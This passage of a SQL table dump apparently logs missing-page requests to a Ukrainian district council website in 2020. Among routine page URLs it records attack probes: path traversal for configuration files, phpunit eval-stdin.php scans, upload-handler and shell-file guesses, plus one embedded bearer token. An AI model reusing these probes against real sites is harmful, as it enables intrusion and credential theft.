00:00:00',301),(34340,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-09082017-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34341,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-17-03-2017-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34342,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-27-12-2016-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34343,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-26-10-2016-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34344,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-07-12-2016-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34345,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennya-vid-25-03-2016-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34346,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34347,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-14122018-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34348,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennya-vid-13-11-2015-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34349,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-23032018-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34350,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-16-06-2017-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34351,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennya-vid-22-04-2016-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34352,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34353,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-15062018-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34354,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-22-03-2017-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34355,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-21-12-2016-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34356,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-22022019-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34357,'https://malyn-rayrada.gov.ua//index.php/2010-06-05-12-55-45/fotogalereya',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34358,'https://malyn-rayrada.gov.ua//index.php/2010-06-05-12-55-45/pochesni-gromadyani-rajonu',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34359,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-22032019-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34360,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-22-07-2016-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34361,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-28072017-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34362,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-151217-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34363,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-21-10-2016-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34364,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-09-11-2016-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34365,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennya-vid-13-05-2016-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34366,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-31-08-2016-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34367,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku',NULL,'','',1,0,'2020-02-23 14:52:12','0000-00-00 00:00:00',301),(34368,'https://malyn-rayrada.gov.ua//index.php/deputatska-storinka',NULL,'','',1,0,'2020-02-23 14:52:12','0000-00-00 00:00:00',301),(34369,'https://www.malyn-rayrada.gov.ua//admin/',NULL,'','',1,0,'2020-02-23 19:26:21','0000-00-00 00:00:00',301),(34370,'https://www.malyn-rayrada.gov.ua//admin/login.php',NULL,'','',1,0,'2020-02-23 19:26:22','0000-00-00 00:00:00',301),(34371,'https://www.malyn-rayrada.gov.ua//admin/index.php?route=common/login',NULL,'','',1,0,'2020-02-23 19:26:22','0000-00-00 00:00:00',301),(34372,'https://malyn-rayrada.gov.ua//admin/',NULL,'','',1,0,'2020-02-23 21:30:18','0000-00-00 00:00:00',301),(34373,'https://malyn-rayrada.gov.ua//admin/index.php?route=common/login',NULL,'','',1,0,'2020-02-23 21:30:19','0000-00-00 00:00:00',301),(34374,'https://malyn-rayrada.gov.ua/index.php/2184-zatverdzheno-pokaznik-serednoji-zarobitnoji-plati-za-gruden-2018-roku-ta-za-2018-rik',NULL,'','',9,0,'2020-02-28 11:07:03','0000-00-00 00:00:00',301),(34375,'https://malyn-rayrada.gov.ua/attachments/article/2364/ðÿð’ðÿð“.pdf',NULL,'','',1,0,'2020-02-28 18:58:42','0000-00-00 00:00:00',301),(34376,'https://malyn-rayrada.gov.ua/attachments/article/2355/ðÿð’ðÿð“ ð²ñ–ð´17022020_1.pdf',NULL,'','',1,0,'2020-02-29 05:38:41','0000-00-00 00:00:00',301),(34377,'https://malyn-rayrada.gov.ua/wp-content/plugins/photo-gallery/filemanager/uploadhandler.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','',1,0,'2020-02-29 08:55:01','0000-00-00 00:00:00',301),(34378,'https://malyn-rayrada.gov.ua/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php',NULL,'malyn-rayrada.gov.ua','',34,0,'2020-02-29 16:04:19','0000-00-00 00:00:00',301),(34379,'https://malyn-rayrada.gov.ua//images/vuln2.php',NULL,'','',1,0,'2020-03-02 22:59:50','0000-00-00 00:00:00',301),(34380,'https://malyn-rayrada.gov.ua//tmp/vuln2.php',NULL,'','',1,0,'2020-03-02 22:59:50','0000-00-00 00:00:00',301),(34381,'https://malyn-rayrada.gov.ua//images/vuln.php',NULL,'','',1,0,'2020-03-02 22:59:50','0000-00-00 00:00:00',301),(34382,'https://malyn-rayrada.gov.ua//tmp/vuln.php',NULL,'','',1,0,'2020-03-02 22:59:51','0000-00-00 00:00:00',301),(34383,'https://malyn-rayrada.gov.ua//index.php/component/users/?view=login',NULL,'','',1,0,'2020-03-02 22:59:52','0000-00-00 00:00:00',301),(34384,'https://malyn-rayrada.gov.ua//components/com_foxcontact/foxcontact.php',NULL,'','',1,0,'2020-03-02 22:59:53','0000-00-00 00:00:00',301),(34385,'https://malyn-rayrada.gov.ua//components/com_b2jcontact/vuln.php',NULL,'','',1,0,'2020-03-02 22:59:54','0000-00-00 00:00:00',301),(34386,'https://malyn-rayrada.gov.ua//jwallpapers_files/plupload/up.php',NULL,'','',1,0,'2020-03-02 22:59:55','0000-00-00 00:00:00',301),(34387,'https://malyn-rayrada.gov.ua//components/com_oziogallery/imagin/scripts_ralcr/filesystem/writetofile.php',NULL,'','',1,0,'2020-03-02 22:59:55','0000-00-00 00:00:00',301),(34388,'https://malyn-rayrada.gov.ua//tmp/up.php',NULL,'','',1,0,'2020-03-02 22:59:56','0000-00-00 00:00:00',301),(34389,'https://malyn-rayrada.gov.ua//modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/\"',NULL,'','',1,0,'2020-03-02 22:59:57','0000-00-00 00:00:00',301),(34390,'https://malyn-rayrada.gov.ua//modules/megamenu/uploadify/up.php',NULL,'','',1,0,'2020-03-02 22:59:57','0000-00-00 00:00:00',301),(34391,'https://malyn-rayrada.gov.ua//modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'','',1,0,'2020-03-02 22:59:58','0000-00-00 00:00:00',301),(34392,'https://malyn-rayrada.gov.ua//modules/mod_simplefileuploadv1.3/elements/up.php',NULL,'','',1,0,'2020-03-02 22:59:58','0000-00-00 00:00:00',301),(34393,'https://malyn-rayrada.gov.ua//images/stories/up.php',NULL,'','',2,0,'2020-03-02 23:00:02','0000-00-00 00:00:00',301),(34394,'https://malyn-rayrada.gov.ua//components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',1,0,'2020-03-02 23:00:03','0000-00-00 00:00:00',301),(34395,'https://malyn-rayrada.gov.ua//components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',1,0,'2020-03-02 23:00:03','0000-00-00 00:00:00',301),(34396,'https://malyn-rayrada.gov.ua//plugins/content/s5_media_player/helper.php?fileurl=li4vli4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',1,0,'2020-03-02 23:00:06','0000-00-00 00:00:00',301),(34397,'https://malyn-rayrada.gov.ua//components/com_sexycontactform/fileupload/',NULL,'','',1,0,'2020-03-02 23:00:06','0000-00-00 00:00:00',301),(34398,'https://malyn-rayrada.gov.ua//fckeditor/editor/filemanager/connectors/php/upload.php?type=media',NULL,'','',1,0,'2020-03-02 23:00:07','0000-00-00 00:00:00',301),(34399,'https://malyn-rayrada.gov.ua/vendor/phpunit/phpunit/license',NULL,'','',6,0,'2020-03-03 10:30:50','0000-00-00 00:00:00',301),(34400,'https://malyn-rayrada.gov.ua/news_and_advice/editors_picks?ad_unit=rdc2/ldp/nfs/desk&is_ldp=true',NULL,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-15062018-roku/2004-pro-rajonnu-programu-stvorennya-ta-vedennya-mistobudivnogo-kadastru-v-malinskomu-rajoni-na-2018-2021-roki','',1,0,'2020-03-04 06:21:47','0000-00-00 00:00:00',301),(34401,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-15062018-roku/assets/scripts/jquery.min.js',NULL,'','',1,0,'2020-03-04 07:15:40','0000-00-00 00:00:00',301),(34402,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-15062018-roku/assets/scripts/bootstrap/bootstrap.min.js',NULL,'','',1,0,'2020-03-04 07:15:41','0000-00-00 00:00:00',301),(34403,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-15062018-roku/assets/scripts/jquery.bxslider.js',NULL,'','',1,0,'2020-03-04 07:15:43','0000-00-00 00:00:00',301),(34404,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-15062018-roku/assets/scripts/jquery.meanmenu.hack.js',NULL,'','',1,0,'2020-03-04 07:15:44','0000-00-00 00:00:00',301),(34405,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-15062018-roku/assets/scripts/jquery.animatenumber.min.js',NULL,'','',1,0,'2020-03-04 07:15:46','0000-00-00 00:00:00',301),(34406,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-15062018-roku/assets/scripts/isotope.pkgd.min.js',NULL,'','',1,0,'2020-03-04 07:15:47','0000-00-00 00:00:00',301),(34407,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-15062018-roku/assets/scripts/jquery-ui.js',NULL,'','',1,0,'2020-03-04 07:15:48','0000-00-00 00:00:00',301),(34408,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-15062018-roku/assets/scripts/video.js',NULL,'','',1,0,'2020-03-04 07:15:48','0000-00-00 00:00:00',301),(34409,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-15062018-roku/assets/scripts/script.js',NULL,'','',1,0,'2020-03-04 07:15:50','0000-00-00 00:00:00',301),(34410,'https://malyn-rayrada.gov.ua/v1/',NULL,'','',4,0,'2020-03-05 04:07:16','0000-00-00 00:00:00',301),(34411,'https://malyn-rayrada.gov.ua/v2/',NULL,'','',4,0,'2020-03-05 04:07:17','0000-00-00 00:00:00',301),(34412,'https://malyn-rayrada.gov.ua/wordpress/wp-admin/setup-config.php',NULL,'','',2,0,'2020-03-05 04:27:22','0000-00-00 00:00:00',301),(34413,'https://malyn-rayrada.gov.ua/wp/wp-admin/setup-config.php',NULL,'','',2,0,'2020-03-05 04:27:22','0000-00-00 00:00:00',301),(34414,'https://malyn-rayrada.gov.ua/blog/wp-admin/setup-config.php',NULL,'','',2,0,'2020-03-05 04:27:23','0000-00-00 00:00:00',301),(34415,'https://malyn-rayrada.gov.ua/test/wp-admin/setup-config.php',NULL,'','',2,0,'2020-03-05 04:27:23','0000-00-00 00:00:00',301),(34416,'https://malyn-rayrada.gov.ua/site/wp-admin/setup-config.php',NULL,'','',1,0,'2020-03-05 04:27:23','0000-00-00 00:00:00',301),(34417,'https://malyn-rayrada.gov.ua/images/stories/8',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-03-09 11:45:09','0000-00-00 00:00:00',301),(34418,'https://www.malyn-rayrada.gov.ua/index.php/2200-komunalne-pidpriemstvo-arkhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',2,0,'2020-03-15 01:28:35','0000-00-00 00:00:00',301),(34419,'https://malyn-rayrada.gov.ua/.svn/entries',NULL,'','',1,0,'2020-03-17 15:26:31','0000-00-00 00:00:00',301),(34420,'https://www.malyn-rayrada.gov.ua/clientlog?loggermissing=1',NULL,'','',1,0,'2020-03-18 17:47:34','0000-00-00 00:00:00',301),(34421,'https://www.malyn-rayrada.gov.ua/cookiepingback?early=true',NULL,'','',1,0,'2020-03-18 19:36:08','0000-00-00 00:00:00',301),(34422,'https://malyn-rayrada.gov.ua/i/profiles/show/wagnersidlofsky/media_timeline?for_photo_rail=true',NULL,'','',1,0,'2020-03-18 21:22:24','0000-00-00 00:00:00',301),(34423,'https://malyn-rayrada.gov.ua/i/related_users/3348479902',NULL,'','',1,0,'2020-03-18 21:22:25','0000-00-00 00:00:00',301),(34424,'https://malyn-rayrada.gov.ua/i/cards/tfw/v1/931495914362912769?cardname=summary_large_image&autoplay_disabled=true&forward=true&earned=true&edge=true&lang=en&card_height=344&scribe_context={\"client\":\"web\",\"page\":\"profile\",\"section\":\"profile\",\"component\":\"tweet\"}&bearer_token=aaaaaaaaaaaaaaaaaaaaapyxbaaaaaaaclxundekmxqa8h%2f40k4moukgsoc%3dtyfbdkbt3jjpcevnmyqilb28nhfopqkca3qaaxgfsykcs0wrbw',NULL,'','',1,0,'2020-03-18 21:22:34','0000-00-00 00:00:00',301),(34425,'https://malyn-rayrada.gov.ua/assets/',NULL,'','',1,0,'2020-03-19 00:33:53','0000-00-00 00:00:00',301),(34426,'https://malyn-rayrada.gov.ua/bk/',NULL,'','',3,0,'2020-03-19 00:33:56','0000-00-00 00:00:00',301),(34427,'https://malyn-rayrada.gov.ua/wp1/',NULL,'','',3,0,'2020-03-19 00:33:56','0000-00-00 00:00:00',301),(34428,'https://malyn-rayrada.gov.ua/wp2/',NULL,'','',3,0,'2020-03-19 00:33:56','0000-00-00 00:00:00',301),(34429,'https://malyn-rayrada.gov.ua/attachments/article/2370/â„–1 ð¿ñ€ð¾ñ‚ð¾ðºð¾ð».pdf',NULL,'','',1,0,'2020-03-19 19:41:34','0000-00-00 00:00:00',301),(34430,'https://malyn-rayrada.gov.ua/index.php/2366-vitaemo-iz-svyatom-vesni',NULL,'','',8,0,'2020-03-19 19:52:52','0000-00-00 00:00:00',301),(34431,'https://malyn-rayrada.gov.ua/image/130088824/large',NULL,'','',1,0,'2020-03-21 01:25:24','0000-00-00 00:00:00',301),(34432,'https://malyn-rayrada.gov.ua/min/?g=awdefaults35&v=16',NULL,'','',1,0,'2020-03-21 05:00:47','0000-00-00 00:00:00',301),(34433,'https://malyn-rayrada.gov.ua/min/?g=awjavascriptdefaults&v=11',NULL,'','',1,0,'2020-03-21 05:00:50','0000-00-00 00:00:00',301),(34434,'https://malyn-rayrada.gov.ua/min/?g=awui',NULL,'','',1,0,'2020-03-21 05:00:51','0000-00-00 00:00:00',301),(34435,'https://malyn-rayrada.gov.ua/inc/img/avatar.php?id=27489',NULL,'','',1,0,'2020-03-21 05:00:53','0000-00-00 00:00:00',301),(34436,'https://malyn-rayrada.gov.ua/inc/img/avatar.php?id=99730',NULL,'','',1,0,'2020-03-21 05:00:54','0000-00-00 00:00:00',301),(34437,'https://malyn-rayrada.gov.ua/inc/img/avatar.php?id=73763',NULL,'','',1,0,'2020-03-21 05:00:55','0000-00-00 00:00:00',301),(34438,'https://malyn-rayrada.gov.ua/image/41880504/large',NULL,'','',1,0,'2020-03-21 19:40:24','0000-00-00 00:00:00',301),(34439,'https://malyn-rayrada.gov.ua/e/public/viewclick/?classid=10&id=85035&addclick=1',NULL,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-22032019-roku/2209-rezultati-poimennogo-golosuvannya-29-sesiji-vid-22-03-2019-roku','',1,0,'2020-03-23 00:03:08','0000-00-00 00:00:00',301),(34440,'https://malyn-rayrada.gov.ua/t/footerdaily',NULL,'','',1,0,'2020-03-23 01:59:56','0000-00-00 00:00:00',301),(34441,'https://malyn-rayrada.gov.ua/web_api/cart',NULL,'','',1,0,'2020-03-24 09:10:12','0000-00-00 00:00:00',301),(34442,'https://malyn-rayrada.gov.ua/api/v4/search/preset_words',NULL,'','',1,0,'2020-03-25 03:26:06','0000-00-00 00:00:00',301),(34443,'https://malyn-rayrada.gov.ua/index.php/1729-28-kvitnya-v-chernyakhovi-zmagalis-deputati',NULL,'','',14,0,'2020-03-31 10:51:59','0000-00-00 00:00:00',301),(34444,'https://www.malyn-rayrada.gov.ua/index.php/1508-vidbulas-8-sesiya-malinskoji-rajonnoji-radi',NULL,'','',5,0,'2020-03-31 11:42:53','0000-00-00 00:00:00',301),(34445,'https://malyn-rayrada.gov.ua/index.php/1450-pishov-z-zhittya-pirizhkivskij-silskij-golova-anatolij-marchenko',NULL,'','',13,0,'2020-03-31 12:15:38','0000-00-00 00:00:00',301),(34446,'https://malyn-rayrada.gov.ua/index.php/1586-ukrajina-vtrete-vidznachae-den-gidnosti-i-svobodi',NULL,'','',15,0,'2020-03-31 13:41:07','0000-00-00 00:00:00',301),(34447,'https://malyn-rayrada.gov.ua/index.php/kontakti',NULL,'','',57,0,'2020-03-31 14:05:11','0000-00-00 00:00:00',301),(34448,'https://malyn-rayrada.gov.ua/index.php/1714-vitaemo-iz-velikodnem',NULL,'','',17,0,'2020-03-31 14:54:40','0000-00-00 00:00:00',301),(34449,'https://malyn-rayrada.gov.ua/index.php/1730-nikoli-znovu',NULL,'','',18,0,'2020-03-31 15:18:24','0000-00-00 00:00:00',301),(34450,'https://malyn-rayrada.gov.ua/index.php/1416-zmagannya-z-futbolu-na-prizi-klubu-shkiryanij-m-yach',NULL,'','',46,0,'2020-03-31 16:42:09','0000-00-00 00:00:00',301),(34451,'https://malyn-rayrada.gov.ua/index.php/1743-uvaga-botulizm',NULL,'','',32,0,'2020-03-31 19:49:15','0000-00-00 00:00:00',301),(34452,'https://malyn-rayrada.gov.ua/index.php/1032-tarifi-dlya-naselennya-na-elektroenergiyu',NULL,'','',10,0,'2020-03-31 20:42:49','0000-00-00 00:00:00',301),(34453,'https://malyn-rayrada.gov.ua/index.php/1340-pro-indeksatsiyu-normativnoji-groshovoji-otsinki',NULL,'','',19,0,'2020-04-01 00:01:08','0000-00-00 00:00:00',301),(34454,'https://www.malyn-rayrada.gov.ua/index.php/1730-nikoli-znovu',NULL,'','',8,0,'2020-04-01 00:45:03','0000-00-00 00:00:00',301),(34455,'https://www.malyn-rayrada.gov.ua/index.php/1729-28-kvitnya-v-chernyakhovi-zmagalis-deputati',NULL,'','',4,0,'2020-04-01 02:06:30','0000-00-00 00:00:00',301),(34456,'https://malyn-rayrada.gov.ua/index.php/1481-propozitsiya-shchodo-initsiyuvannya-dobrovilnogo-ob-ednannya-teritorialnikh-gromad',NULL,'','',22,0,'2020-04-01 02:09:37','0000-00-00 00:00:00',301),(34457,'https://malyn-rayrada.gov.ua/index.php/1508-vidbulas-8-sesiya-malinskoji-rajonnoji-radi',NULL,'','',28,0,'2020-04-01 02:41:08','0000-00-00 00:00:00',301),(34458,'https://malyn-rayrada.gov.ua/index.php/1799-sportfest-u-malinivtsi',NULL,'','',16,0,'2020-04-01 03:36:26','0000-00-00 00:00:00',301),(34459,'https://malyn-rayrada.gov.ua/index.php/1457-vitaemo-iz-svyatom-ostannogo-dzvonika',NULL,'','',21,0,'2020-04-01 03:46:28','0000-00-00 00:00:00',301),(34460,'https://malyn-rayrada.gov.ua/index.php/1707-informatsiya-iz-sportivnikh-zmagan-2',NULL,'','',21,0,'2020-04-01 05:16:49','0000-00-00 00:00:00',301),(34461,'https://www.malyn-rayrada.gov.ua/index.php/1433-26-kvitnya-2016-roku-vipovnyuetsya-30-rokiv-yak-vidbulasya-najmasshtabnisha-tekhnogenna-katastrofa-za-ves-chas-vikoristannya-atomnoji-energetiki-avariya-na-chornobilskij-atomnij-elektrostantsiji',NULL,'','',21,0,'2020-04-01 06:41:09','0000-00-00 00:00:00',301),(34462,'https://malyn-rayrada.gov.ua/index.php/1446-prokhannya-pro-dopomogu',NULL,'','',19,0,'2020-04-01 06:49:18','0000-00-00 00:00:00',301),(34463,'https://www.malyn-rayrada.gov.ua/index.php/kontakti',NULL,'','',4,0,'2020-04-01 07:40:50','0000-00-00 00:00:00',301),(34464,'https://malyn-rayrada.gov.ua/index.php/1642-veselogo-rizdva-2',NULL,'','',27,0,'2020-04-01 14:53:32','0000-00-00 00:00:00',301),(34465,'https://malyn-rayrada.gov.ua/index.php/1797-vitaemo-z-dnem-nezalezhnosti-ukrajini',NULL,'','',15,0,'2020-04-02 00:20:45','0000-00-00 00:00:00',301),(34466,'https://www.malyn-rayrada.gov.ua//vendor/phpunit/phpunit/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:27:44','0000-00-00 00:00:00',301),(34467,'https://www.malyn-rayrada.gov.ua//vendor/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:28:16','0000-00-00 00:00:00',301),(34468,'https://www.malyn-rayrada.gov.ua//vendor/phpunit/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:28:52','0000-00-00 00:00:00',301),(34469,'https://www.malyn-rayrada.gov.ua//phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:29:16','0000-00-00 00:00:00',301),(34470,'https://www.malyn-rayrada.gov.ua//phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:30:03','0000-00-00 00:00:00',301),(34471,'https://www.malyn-rayrada.gov.ua//phpunit/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:30:20','0000-00-00 00:00:00',301),(34472,'https://www.malyn-rayrada.gov.ua//lib/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:30:52','0000-00-00 00:00:00',301),(34473,'https://www.malyn-rayrada.gov.ua//lib/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:32:19','0000-00-00 00:00:00',301),(34474,'https://www.malyn-rayrada.gov.ua/modules/ps_facetedsearch/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:32:44','0000-00-00 00:00:00',301),(34475,'https://www.malyn-rayrada.gov.ua//lib/phpunit/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:33:53','0000-00-00 00:00:00',301),(34476,'https://www.malyn-rayrada.gov.ua//panel/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:34:22','0000-00-00 00:00:00',301),(34477,'https://www.malyn-rayrada.gov.ua//test/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:34:43','0000-00-00 00:00:00',301),(34478,'https://www.malyn-rayrada.gov.ua//api/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:35:16','0000-00-00 00:00:00',301),(34479,'https://www.malyn-rayrada.gov.ua//old/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:36:00','0000-00-00 00:00:00',301),(34480,'https://www.malyn-rayrada.gov.ua//wp-content/plugins/mm-plugin/inc/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:36:37','0000-00-00 00:00:00',301),(34481,'https://www.malyn-rayrada.gov.ua//laravel/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:36:53','0000-00-00 00:00:00',301),(34482,'https://www.malyn-rayrada.gov.ua//admin/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:37:13','0000-00-00 00:00:00',301),(34483,'https://www.malyn-rayrada.gov.ua//wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:37:52','0000-00-00 00:00:00',301),(34484,'https://www.malyn-rayrada.gov.ua//sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-02 11:38:15','0000-00-00 00:00:00',301),(34485,'https://www.malyn-rayrada.gov.ua/index.php/1761-pro-pensijnu-reformu',NULL,'','',8,0,'2020-04-02 14:24:33','0000-00-00 00:00:00',301),(34486,'https://www.malyn-rayrada.gov.ua/index.php/1416-zmagannya-z-futbolu-na-prizi-klubu-shkiryanij-m-yach',NULL,'','',10,0,'2020-04-02 19:11:35','0000-00-00 00:00:00',301),(34487,'https://www.malyn-rayrada.gov.ua/index.php/931-vbivali-golodom-nashu-svobodu-ne-pidkoreni-v-33-mu-neperemozhni',NULL,'','',6,0,'2020-04-03 00:36:41','0000-00-00 00:00:00',301),(34488,'https://malyn-rayrada.gov.ua/index.php/1748-terminovo-do-30-chervnya-2017-roku-provoditsya-nabir-v-mirotvorchij-batalon-m-novograd-volinskij',NULL,'','',28,0,'2020-04-03 09:43:34','0000-00-00 00:00:00',301),(34489,'https://malyn-rayrada.gov.ua/index.php/1445-final-kubku-rajonu-z-futbolu',NULL,'','',24,0,'2020-04-04 02:38:36','0000-00-00 00:00:00',301),(34490,'https://malyn-rayrada.gov.ua/index.php/1351-sotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-2015-rik',NULL,'','',23,0,'2020-04-04 17:54:45','0000-00-00 00:00:00',301),(34491,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-2202201',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:51','0000-00-00 00:00:00',301),(34492,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-1702202',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:51','0000-00-00 00:00:00',301),(34493,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-2610201',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:51','0000-00-00 00:00:00',301),(34494,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-1412201',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:52','0000-00-00 00:00:00',301),(34495,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-2602202',NULL,'https://malyn-rayrada.gov.ua/','',1,0,'2020-04-04 18:09:52','0000-00-00 00:00:00',301),(34496,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-1008201',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:52','0000-00-00 00:00:00',301),(34497,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-1112201',NULL,'https://malyn-rayrada.gov.ua/','',1,0,'2020-04-04 18:09:52','0000-00-00 00:00:00',301),(34498,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-1810201',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:52','0000-00-00 